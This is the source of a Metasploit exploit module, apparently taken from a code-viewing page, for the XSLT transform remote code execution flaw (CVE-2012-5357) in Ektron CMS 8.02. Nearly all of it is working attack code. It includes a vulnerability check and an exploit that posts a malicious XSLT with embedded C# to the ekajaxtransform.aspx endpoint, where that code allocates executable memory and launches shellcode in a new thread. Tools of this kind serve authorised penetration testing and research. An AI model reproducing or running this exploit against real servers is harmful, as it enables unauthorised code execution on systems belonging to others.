Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',16'Description' => %q{17This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The18vulnerability exists due to the insecure usage of XslCompiledTransform, using a19XSLT controlled by the user. The module has been tested successfully on Ektron CMS208.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK21SERVICE privileges.22},23'Author' => [24'Rich Lundeen', # Vulnerability discovery25'juan vazquez', # Metasploit module26'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread27],28'License' => MSF_LICENSE,29'References' => [30[ 'CVE', '2012-5357'],31[ 'OSVDB', '88107' ],32[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],33[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]34],35'Payload' => {36'Space' => 2048,37'StackAdjustment' => -350038},39'Platform' => 'win',40'Privileged' => true,41'Targets' => [42['Windows 2003 SP2 / Ektron CMS400 8.02', {}],43],44'DefaultTarget' => 0,45'DisclosureDate' => '2012-10-16',46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),57OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])58]59)60end6162def check63fingerprint = rand_text_alpha(5 + rand(5))64xslt_data = <<~XSLT65<?xml version='1.0'?>66<xsl:stylesheet version="1.0"67xmlns:xsl="http://www.w3.org/1999/XSL/Transform"68xmlns:msxsl="urn:schemas-microsoft-com:xslt"69xmlns:user="http://mycompany.com/mynamespace">70<msxsl:script language="C#" implements-prefix="user">71<![CDATA[72public string xml()73{74return "#{fingerprint}";75}76]]>77</msxsl:script>78<xsl:template match="/">79<xsl:value-of select="user:xml()"/>80</xsl:template>81</xsl:stylesheet>82XSLT8384res = send_request_cgi(85{86'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",87'version' => '1.1',88'method' => 'POST',89'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",90'headers' => {91"Referer" => build_referer92},93'vars_post' => {94"xml" => rand_text_alpha(5 + rand(5)),95"xslt" => xslt_data96}97}98)99100if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/101return Exploit::CheckCode::Vulnerable102end103104return Exploit::CheckCode::Safe105end106107def uri_path108uri_path = target_uri.path109uri_path << "/" if uri_path[-1, 1] != "/"110uri_path111end112113def build_referer114if datastore['SSL']115schema = "https://"116else117schema = "http://"118end119120referer = schema121referer << rhost122referer << ":#{rport}"123referer << uri_path124referer125end126127def exploit128print_status("Generating the EXE Payload and the XSLT...")129fingerprint = rand_text_alpha(5 + rand(5))130131xslt_data = <<~XSLT132<?xml version='1.0'?>133<xsl:stylesheet version="1.0"134xmlns:xsl="http://www.w3.org/1999/XSL/Transform"135xmlns:msxsl="urn:schemas-microsoft-com:xslt"136xmlns:user="http://mycompany.com/mynamespace">137<msxsl:script language="C#" implements-prefix="user">138<![CDATA[139140private static UInt32 MEM_COMMIT = 0x1000;141private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;142143[System.Runtime.InteropServices.DllImport("kernel32")]144private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);145146[System.Runtime.InteropServices.DllImport("kernel32")]147private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);148149public string xml()150{151string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";152byte[] shellcode = System.Convert.FromBase64String(shellcode64);153UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);154System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);155IntPtr hThread = IntPtr.Zero;156IntPtr pinfo = IntPtr.Zero;157UInt32 threadId = 0;158hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);159return "#{fingerprint}";160}161]]>162</msxsl:script>163<xsl:template match="/">164<xsl:value-of select="user:xml()"/>165</xsl:template>166</xsl:stylesheet>167XSLT168169print_status("Trying to run the xslt transformation...")170res = send_request_cgi(171{172'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",173'version' => '1.1',174'method' => 'POST',175'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",176'headers' => {177"Referer" => build_referer178},179'vars_post' => {180"xml" => rand_text_alpha(5 + rand(5)),181"xslt" => xslt_data182}183}184)185if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/186print_good("Exploitation was successful")187else188fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")189end190end191end192193194